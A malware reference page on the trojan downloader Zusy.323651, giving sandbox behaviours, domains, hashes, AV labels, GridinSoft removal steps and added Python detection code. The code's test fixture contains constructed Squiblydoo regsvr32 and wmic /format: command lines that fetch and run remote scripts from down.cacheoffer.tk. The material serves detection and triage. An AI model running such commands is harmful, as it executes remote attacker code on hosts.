Categories: Malware

Zusy.323651 malicious file

Zusy.323651 (in full, Gen:Variant.Zusy.323651) is the detection name under which the file described below is reported; the sandbox run and nearly every antivirus engine in the list further down flag it as malicious, most of them as a trojan downloader. While the infection is active you may notice unfamiliar processes in the Task Manager list. In that case it is advised to scan your computer with GridinSoft Anti-Malware.


What can Zusy.323651 do?

The behaviours below are the sandbox signatures that fired when the sample was run (the storage path under File Info shows a CAPEv2 installation). The two Squiblydoo entries and the wmic.exe entry describe concrete techniques; the anti-debugging and dynamic-import entries also fire on a great deal of benign software and are weak indicators on their own.

  • SetUnhandledExceptionFilter detected (possible anti-debug)
  • Guard page use detected (possible anti-debugging)
  • Dynamic (imported) function loading detected
  • Performs HTTP requests potentially not found in PCAP
  • An HTTP/S link was seen in a script or command line
  • Authenticode signature is invalid
  • Uses Windows utilities for basic functionality
  • RegSvr32 loaded a DLL related to the Squiblydoo application control bypass technique
  • Attempts to bypass application controls using the Squiblydoo technique
  • Harvests cookies for information gathering
  • Created network traffic indicative of malicious activity
  • Suspicious wmic.exe use was detected

Related domains:

wpad.local-net
down.cacheoffer.tk

wpad.local-net is the name Windows queries for Web Proxy Auto-Discovery on a network whose DNS suffix is local-net; it shows up in most sandbox runs and is not an indicator on its own. down.cacheoffer.tk is specific to this sample and is the name worth searching DNS and proxy logs for.
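
The Squiblydoo and wmic.exe signatures above are both visible in process-creation telemetry (Sysmon Event ID 1, EDR process events) without a sandbox. The following is an added example, not code from this page, GridinSoft or CAPE: it classifies (image path, command line) records for the regsvr32 /i: + scrobj.dll pattern, for wmic fetching a remote XSL stylesheet through /format:, for any HTTP/S URL on the command line, and for contact with the two domains listed above. The event records are constructed for the demonstration; the page gives only the signature names, not the sample's actual command lines.

```python
"""Flag process-creation records for the behaviours the sandbox reported.

Added example (not from the page, GridinSoft or CAPE). The command lines in
SAMPLE_EVENTS are constructed; only the two domains come from the page.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Domains from the "Related domains" list on this page.
RELATED_DOMAINS = {"wpad.local-net", "down.cacheoffer.tk"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Squiblydoo: regsvr32 /i:<scriptlet> together with scrobj.dll (usually with /s /n /u).
SQUIBLYDOO_RE = re.compile(r"/i:\S+", re.IGNORECASE)
# wmic ... /format:<url> makes wmic download and run an XSL stylesheet.
WMIC_REMOTE_XSL_RE = re.compile(r"/format:\s*[\"']?https?://", re.IGNORECASE)

# Constructed sample events: (image path, command line). Not sandbox output.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s /n /u /i:http://down.cacheoffer.tk/x.sct scrobj.dll"),
    (r"C:\Windows\System32\wbem\wmic.exe",
     r'wmic os get /format:"http://down.cacheoffer.tk/a.xsl"'),
    (r"C:\Windows\System32\regsvr32.exe",
     r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    (r"C:\Windows\System32\wbem\wmic.exe",
     r"wmic process list brief"),
]


def image_name(image: str) -> str:
    """Basename of the process image, lowercase, tolerant of either slash."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(image: str, cmdline: str) -> list[str]:
    """Return the behaviour tags a single process-creation record triggers."""
    tags: list[str] = []
    name = image_name(image)
    urls = URL_RE.findall(cmdline)
    if (name == "regsvr32.exe" and "scrobj.dll" in cmdline.lower()
            and SQUIBLYDOO_RE.search(cmdline)):
        tags.append("squiblydoo")
    if name == "wmic.exe" and WMIC_REMOTE_XSL_RE.search(cmdline):
        tags.append("wmic_remote_xsl")
    if urls:
        tags.append("url_in_cmdline")
    hosts = {urlparse(u).hostname for u in urls}
    if hosts & RELATED_DOMAINS:
        tags.append("related_domain")
    return tags


def scan(events: list[tuple[str, str]]) -> list[tuple[str, list[str]]]:
    """Run classify() over (image, cmdline) pairs and keep only the records that hit."""
    hits = []
    for image, cmdline in events:
        tags = classify(image, cmdline)
        if tags:
            hits.append((image_name(image), tags))
    return hits


if __name__ == "__main__":
    for name, tags in scan(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(tags)}")
```

The checks key on the image's basename, so a copy of regsvr32.exe renamed by the attacker would slip past; where the log source carries the PE's OriginalFileName (Sysmon does), match on that field instead. A scriptlet that was first written to disk and then loaded with a local /i: path is also not caught by the URL check, only by the scrobj.dll one.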

How to identify Zusy.323651?

File Info:

name: F5A747E3EAD7102CAAA2.mlw
path: /opt/CAPEv2/storage/binaries/c2d009c47ea3aa4eef2791bec014f521d269d51a30b6644e93c133012ac8a244
crc32: BC3D7F4F
md5: f5a747e3ead7102caaa23ee272d593d9
sha1: 3201ac2c20aae886af461ec8604182063883670e
sha256: c2d009c47ea3aa4eef2791bec014f521d269d51a30b6644e93c133012ac8a244
sha512: 541c04ec37f3fec7bb67cc3f3952086b6f6a8847f7a376c958b4c24ef1b2974303475cade54f61461a8d2471afbb491688769a31ea1f5623e6fd60df2e2c5973
ssdeep: 24:etGSIfDhyazgFChZmSW/k+hYhNCNPaZ88ZtSS:6KcQhZDWM+hYh8da1+
type: PE32 executable (console) Intel 80386, for MS Windows
tlsh: T166511ECB722225F2F12893BD0683DD45E5AD233803D257640F41A4C9D448C1B743AFCB
sha3_384: 4be9d2209e185b60c4b66d1d6d9798327dfe7d2471a82f604ba1a6b5241a970eb24eb260f904b6bba2dca5748f221af2
ep_bytes: 558bec6a006800304000ff1500204000
timestamp: 2018-04-22 20:49:58

The name is the sandbox's storage name (the first 20 hex digits of the MD5 plus .mlw), not the file's original name. The timestamp is the PE header's compile time, which the author controls, so treat it as a hint rather than evidence.

Version Info:

0: [No Data]
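
The hashes and ep_bytes above are the indicators a responder actually uses to decide whether a file on disk is this sample. The following is an added example, not code from this page or the sandbox: it hashes a file with the algorithms listed in File Info (CRC32, MD5, SHA-1, SHA-256, SHA3-384) and compares them with the published values, then walks the PE headers to read the 16 bytes at AddressOfEntryPoint so they can be compared with ep_bytes. The digest values are copied from the page; the minimal PE built by build_sample_pe() is constructed here only to exercise the parser.

```python
"""Check a file against the Zusy.323651 indicators listed above.

Added example (not from the page or CAPE). ZUSY_IOCS and ZUSY_EP_BYTES are
copied from the File Info block; build_sample_pe() is a constructed test input.
"""
from __future__ import annotations

import hashlib
import struct
import zlib

# Indicators copied from the File Info block on this page (lowercase hex).
ZUSY_IOCS = {
    "crc32": "bc3d7f4f",
    "md5": "f5a747e3ead7102caaa23ee272d593d9",
    "sha1": "3201ac2c20aae886af461ec8604182063883670e",
    "sha256": "c2d009c47ea3aa4eef2791bec014f521d269d51a30b6644e93c133012ac8a244",
    "sha3_384": "4be9d2209e185b60c4b66d1d6d9798327dfe7d2471a82f604ba1a6b5241a970eb24eb260f904b6bba2dca5748f221af2",
}
ZUSY_EP_BYTES = bytes.fromhex("558bec6a006800304000ff1500204000")


def digests(data: bytes) -> dict[str, str]:
    """Compute the same digests the sandbox reports, as lowercase hex."""
    return {
        "crc32": f"{zlib.crc32(data) & 0xFFFFFFFF:08x}",
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


def matching_iocs(data: bytes, iocs: dict[str, str] = ZUSY_IOCS) -> list[str]:
    """Names of the algorithms whose digest of `data` equals the published value."""
    got = digests(data)
    return [alg for alg, value in iocs.items() if got.get(alg) == value.lower()]


def pe_entry_bytes(data: bytes, count: int = 16) -> bytes | None:
    """Return `count` bytes at AddressOfEntryPoint of a PE file, or None if it is not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    try:
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        coff = e_lfanew + 4                              # IMAGE_FILE_HEADER
        (num_sections,) = struct.unpack_from("<H", data, coff + 2)
        (opt_size,) = struct.unpack_from("<H", data, coff + 16)
        opt = coff + 20                                  # IMAGE_OPTIONAL_HEADER
        (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
        sections = opt + opt_size                        # first IMAGE_SECTION_HEADER
        for i in range(num_sections):
            hdr = sections + i * 40
            vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
            if vaddr <= entry_rva < vaddr + max(vsize, raw_size):
                offset = raw_ptr + (entry_rva - vaddr)   # RVA -> file offset
                return data[offset:offset + count]
    except struct.error:
        return None
    return None


def build_sample_pe(ep_bytes: bytes) -> bytes:
    """Constructed minimal PE32 with one .text section, used only to exercise the parser."""
    pe = bytearray(0x400)
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                       # e_lfanew
    pe[0x40:0x44] = b"PE\0\0"
    # Machine=i386, 1 section, SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE|32BIT
    struct.pack_into("<HHIIIHH", pe, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = 0x58
    struct.pack_into("<H", pe, opt, 0x10B)                        # PE32 magic
    struct.pack_into("<I", pe, opt + 16, 0x1000)                  # AddressOfEntryPoint
    sec = opt + 0xE0
    pe[sec:sec + 8] = b".text\0\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", pe, sec + 8, len(ep_bytes), 0x1000, 0x200, 0x200)
    pe[0x200:0x200 + len(ep_bytes)] = ep_bytes
    return bytes(pe)


def check_file(data: bytes) -> dict:
    """Summary a triage script would log for one file."""
    return {
        "hash_matches": matching_iocs(data),
        "entry_bytes_match": pe_entry_bytes(data) == ZUSY_EP_BYTES,
    }


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(ZUSY_EP_BYTES)
    print(check_file(blob))
```

An exact hash match identifies only this one build; the ssdeep and tlsh values in File Info exist for near-matching repacked variants and need the ssdeep and tlsh libraries, which this example leaves out. The ep_bytes prologue (push ebp; mov ebp,esp; push 0; push 0x403000; call [0x402000]) is an ordinary compiler-generated entry for a small console program, so a match there corroborates a hash hit but should not be used on its own.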

Zusy.323651 also known as (Zusy is the BitDefender engine's family name, which is why eScan, ALYac, Ad-Aware, Emsisoft and GData report the same string; several other vendors put Win64 in their name although the file header says PE32, so treat these as labels rather than analysis):

Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.323651
FireEye Generic.mg.f5a747e3ead7102c
ALYac Gen:Variant.Zusy.323651
Cylance Unsafe
Zillya Downloader.Agent.Win64.409
Sangfor Trojan.Win32.APosT.dcc
K7AntiVirus Trojan-Downloader ( 0052f8ef1 )
Alibaba TrojanDownloader:Win32/JbossMiner.4aa44cdf
K7GW Trojan-Downloader ( 0052f8ef1 )
Cybereason malicious.3ead71
Cyren W32/S-ee3b31b2!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/TrojanDownloader.Agent.CB
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Variant.Zusy.323651
NANO-Antivirus Trojan.Win32.APosT.fasoad
ViRobot Trojan.Win32.Z.Cerbu.3072.D
Avast Win32:JbossMiner-C [Trj]
Tencent Win64.Trojan-downloader.Agent.Edxf
Ad-Aware Gen:Variant.Zusy.323651
TACHYON Trojan/W32.APosT.3072.B
Comodo Malware@#3sjhlcc94n570
DrWeb Trojan.DownLoader26.42915
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0PH321
McAfee-GW-Edition GenericRXFD-SR!F5A747E3EAD7
Emsisoft Gen:Variant.Zusy.323651 (B)
GData Gen:Variant.Zusy.323651
Jiangmin Trojan.APosT.dc
Avira HEUR/AGEN.1115131
Antiy-AVL Trojan/Generic.ASMalwS.25E651B
Arcabit Trojan.Zusy.D4F043
Microsoft Trojan:Win32/Skeeyah.A!rfn
Cynet Malicious (score: 99)
AhnLab-V3 Malware/Win32.Generic.C2479368
McAfee GenericRXFD-SR!F5A747E3EAD7
MAX malware (ai score=94)
VBA32 Trojan.Downloader
TrendMicro-HouseCall TROJ_GEN.R002C0PH321
Yandex Trojan.APosT!Z91N/1zgjZ8
Ikarus Trojan-Downloader.Win64.Agent
Fortinet W32/Agent.CB!tr.dldr
BitDefenderTheta Gen:NN.ZexaF.34294.aqW@au5N5nf
AVG Win32:JbossMiner-C [Trj]
Panda Trj/Genetic.gen
CrowdStrike win/malicious_confidence_100% (W)

How to remove Zusy.323651?

  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a "Standard scan".
  • Move all detected items to quarantine.
  • Open the "Tools" tab and press "Reset Browser Settings".
  • Select the browser and options you want, then click "Reset".
  • Restart your computer.
Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.
